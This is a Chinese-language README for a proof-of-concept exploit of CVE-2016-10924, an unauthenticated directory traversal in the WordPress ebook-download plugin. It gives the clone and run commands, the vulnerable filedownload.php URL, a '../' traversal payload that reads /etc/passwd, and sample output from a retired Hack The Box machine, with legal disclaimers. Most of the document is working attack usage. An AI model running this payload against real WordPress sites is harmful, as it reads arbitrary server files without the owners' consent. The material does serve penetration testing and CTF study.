此仓库包含针对 WordPress 插件 ebook-download(版本 < 1.2)中 目录遍历 漏洞(CVE-2016-10924)的概念验证(PoC)利用脚本。
该漏洞允许通过精心构造的 GET 请求未授权读取文件。该利用利用一个名为 ebookdownloadurl 的参数来遍历目标服务器上的目录。
ebook-download 插件 < 1.2ebookdownloadurl 参数中的文件路径,读取底层操作系统上的任意文件,例如 /etc/passwd。注意: 此 PoC 仅用于 教育和授权测试 目的。滥用此信息可能导致法律后果。
requests 库(通过 pip install requests 安装)克隆仓库:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
安装依赖:
pip install requests
运行利用脚本:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
指定要读取的文件路径: 启动脚本后,系统会提示您输入文件路径。例如:
../../../../../../../../../etc/passwd
您可能需要根据目标环境中的 web 根目录位置调整 ../ 的数量。
退出:
exit、quit,或在空提示符下按 Enter 键退出。我在已退役的 Hack The Box 机器 "Backdoor" 上使用了此利用脚本:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] 输入文件路径(例如 ../../../../../etc/passwd)。键入 'exit' 退出。
Enter File path: ../../../../../../../../../etc/passwd
[*] 目标 URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] 状态码: 200
[+] 文件内容:
root:x:0:0:root:/root:/bin/bash
...
本项目仅用于 教育 和 合法的安全测试 目的。
请勿 对任何未经明确授权的系统使用本仓库中的信息或脚本。
作者和贡献者对因使用此工具而导致的任何滥用或损坏 不承担任何责任。
本项目采用 GNU 2.0 许可证 进行许可。欢迎使用和修改,但请注明出处。
参考资料